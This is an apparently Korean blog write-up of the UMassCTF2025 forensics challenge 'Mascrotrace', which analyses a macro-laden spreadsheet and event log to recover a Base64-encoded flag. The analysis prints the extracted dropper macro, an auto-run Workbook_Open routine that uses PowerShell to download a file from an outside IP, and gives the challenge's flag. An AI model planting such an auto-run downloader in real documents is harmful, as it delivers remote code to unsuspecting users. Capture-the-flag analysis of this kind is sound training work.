[UMassCTF2025] forensic_Mascrotrace

2025. 4. 21. 09:55Β·CTF

πŸ›‘οΈ UMassCTF2025

UMass Amhers(맀사좔세츠 λŒ€ν•™κ΅ μ• λ¨ΈμŠ€νŠΈ 캠퍼슀)의 2025λ…„ CTF이닀.

λŒ€νšŒκ°€ λλ‚œ 후에 Write-Up μž‘μ„±μ΄ ν—ˆμš©λœλ‹€.

 

 

πŸ” λ¬Έμ œ

ν•œ νμ‡„λœ ν”Œλž˜μ‹œ κ²Œμž„ μŠ€νŠœλ””μ˜€μ˜ μ•„μΉ΄μ΄λΈŒμ—μ„œ μ˜μ‹¬μŠ€λŸ¬μš΄ μŠ€ν”„λ ˆλ“œμ‹œνŠΈκ°€ λ°œκ²¬λ˜μ—ˆμŠ΅λ‹ˆλ‹€.
μ—΄μžλ§ˆμž λ­”κ°€κ°€ μ‹€ν–‰λ˜μ—ˆμ§€λ§Œ, μ§€κΈˆμ€ κ·Έ 무엇도 남아 μžˆμ§€ μ•ŠμŠ΅λ‹ˆλ‹€.
λ‹Ήμ‹ μ˜ μž„λ¬΄: 맀크둜λ₯Ό λ¦¬λ²„μ‹±ν•˜κ³ , 그것이 μ–΄λ–€ 일을 ν–ˆλŠ”μ§€ λΆ„μ„ν•˜μ—¬, μ‚­μ œν•˜λ € ν–ˆλ˜ ν”Œλž˜κ·Έλ₯Ό λ³΅κ΅¬ν•˜μ„Έμš”.

 

✏️ Write-Up

zip νŒŒμΌμ—λŠ” λ‹€μŒκ³Ό 같은 파일이 λ“€μ–΄μžˆλ‹€.

 

`dropper.xlsm`을 μ‹€ν–‰ν–ˆλ”λ‹ˆ λ§€ν¬λ‘œκ°€ μ‹€ν–‰λ˜μ—ˆκ³ , ν•΄λ‹Ή λ§€ν¬λ‘œκ°€ μ•…μ„± ν–‰μœ„λ₯Ό μˆ˜ν–‰ν–ˆλ‹€λŠ” 것을 μΆ”λ‘ ν•  수 μžˆλ‹€.

ν•΄λ‹Ή μ—‘μ…€ 파일 μ•ˆμ˜ λ§€ν¬λ‘œλŠ” λ“œλ‘œνΌ μ•…μ„± μ½”λ“œλ‘œ μ‚¬μš©λ˜μ—ˆμ„ 것을 μ˜ˆμΈ‘ν•  수 μžˆλ‹€.

`flash.evtx`λŠ” ν•΄λ‹Ή 맀크둜λ₯Ό μ‹€ν–‰ν–ˆμ„ λ•Œ λ°œμƒν•œ μ‹œμŠ€ν…œ 이벀트 νŒŒμΌμ΄λ‹€.

 

λ¨Όμ €, 맀크둜 μ½”λ“œλ₯Ό λΆ„μ„ν•˜κΈ° μœ„ν•΄ olevbaλΌλŠ” νˆ΄μ„ μ΄μš©ν•˜μ˜€λ‹€.

https://github.com/decalage2/oletools/wiki/olevba

 

olevba

oletools - python tools to analyze MS OLE2 files (Structured Storage, Compound File Binary Format) and MS Office documents, for malware analysis, forensics and debugging. - decalage2/oletools

github.com

 

olevba둜 vba μ½”λ“œλ₯Ό μΆ”μΆœν•˜λ©΄ λ‹€μŒκ³Ό 같은 κ²°κ³Ό 값을 얻을 수 μžˆλ‹€.

 

μΆ”μΆœλœ μ½”λ“œλŠ” λ‹€μŒκ³Ό κ°™λ‹€.

Private Sub Workbook_Open()
    Dim cmd As String
    cmd = "powershell.exe -Command ""Invoke-WebRequest -Uri 'http://34.138.121.94:8000/stage1.txt' -OutFile $env:TEMP\stage1.txt"""
    Shell cmd
End Sub

 

` http://34.138.121.94:8000/stage1.txt` 으둜 μ›Ήν›… μš”μ²­μ„ λ‚ λ € 결괏값을 `$env:TEMP\stage1.txt` 에 μ €μž₯ν•˜κ³  μžˆλŠ” 것을 확인 ν•  수 μžˆλ‹€.

그리고 ν•΄λ‹Ή νŒŒμΌμ„ μ‹€ν–‰ν•˜λŠ” μ½”λ“œμ΄λ‹€.

 

그럼 이제 ν•΄λ‹Ή 파일이 μ–΄λ–€ ν–‰μœ„λ₯Ό μˆ˜ν–‰ν–ˆλŠ”μ§€ `flash.evtx`λ₯Ό μ—΄μ–΄μ„œ 확인해 보자.

μ΄λ²€νŠΈκ°€ 89개 μ‘΄μž¬ν•˜μ˜€κ³ , μ‹œκ°„ κΈ°μ€€μœΌλ‘œ μ •λ ¬ν•˜μ—¬ ν•˜λ‚˜μ”© μ‚΄νŽ΄λ³΄μ•˜λ‹€.

 

λ‹€μŒ μ΄λ²€νŠΈκ°€ λˆˆμ— λ„μ—ˆλ‹€. λ³€μˆ˜λ₯Ό μ„€μ •ν•΄ μ£ΌλŠ” μ½”λ“œμ˜€λ‹€.

 

이 μ™Έμ—λŠ” λ‹€μŒκ³Ό 같이 λ¬΄μž‘μœ„ λ¬Έμžμ—΄μ„ μƒμ„±ν•œ μ½”λ“œμ™€ κ·Έ μ½”λ“œμ˜ μ‹€ν–‰ 결과만 μžˆμ—ˆλ‹€.

 

λ”°λΌμ„œ μ˜μ‹¬λ˜λŠ” λ¬Έμžμ—΄μΈ `VU1BU1N7ZHJvcF9pdF9saWtlX2l0c19ob3R9`을 Base64둜 λ””μ½”λ”©ν•΄λ³΄μ•˜λ‹€.

 

이둜써 ν”Œλž˜κ·Έλ₯Ό νšλ“ν•  수 μžˆμ—ˆλ‹€.

 

🚩 ν”Œλž˜κ·Έ

UMASS{drop_it_like_its_hot}

μ €μž‘μžν‘œμ‹œ λΉ„μ˜λ¦¬ (μƒˆμ°½μ—΄λ¦Ό)

'CTF' μΉ΄ν…Œκ³ λ¦¬μ˜ λ‹€λ₯Έ κΈ€

[UMassCTF2025] forensic_No Updates  (0) 2025.04.21
picoCTF 2021 | information  (0) 2022.06.22
picoCTF 2021 | Mod 26  (0) 2022.06.22
picoCTF 2021 | Wave a flag  (0) 2022.06.22
picoCTF 2021 | Obedient Cat  (0) 2022.06.22
'CTF' μΉ΄ν…Œκ³ λ¦¬μ˜ λ‹€λ₯Έ κΈ€
  • [UMassCTF2025] forensic_No Updates
  • picoCTF 2021 | information
  • picoCTF 2021 | Mod 26
  • picoCTF 2021 | Wave a flag
602zzang
602zzang
  • 602zzang
    yks_STUDY
    602zzang
  • 전체
    였늘
    μ–΄μ œ
    • λΆ„λ₯˜ 전체보기 (76)
      • Programming Language (36)
        • C (15)
        • PYTHON (9)
        • RUST (12)
      • Network (0)
      • Reverse Engineering (3)
      • OS (17)
        • LINUX (17)
        • UNIX (0)
      • λ³΄μ•ˆ 이슈 (6)
      • CTF (6)
      • 기타 (6)
  • λΈ”λ‘œκ·Έ 메뉴

    • ν™ˆ
    • νƒœκ·Έ
    • λ°©λͺ…둝
  • 링크

  • 곡지사항

  • 인기 κΈ€

  • νƒœκ·Έ

    umassctf2025
    P4C
    Rocky Linux
    μ†ŒμΌ“ 톡신
    λ°±μ€€
    TeamH4C
    λ³΄μ•ˆλ™ν–₯
    μ½”λ“œμ—…
    python
    malloc
    곡급망
    picoCTF
    λ“œλ¦Όν•΅
    빑곡팟
    c
    파이썬
    λ³΄μ•ˆμ΄μŠˆ
    rust
    bandit
    rustling
  • 졜근 λŒ“κΈ€

  • 졜근 κΈ€

  • hELLOΒ· Designed Byμ •μƒμš°.v4.10.0
602zzang
[UMassCTF2025] forensic_Mascrotrace
μƒλ‹¨μœΌλ‘œ

ν‹°μŠ€ν† λ¦¬νˆ΄λ°”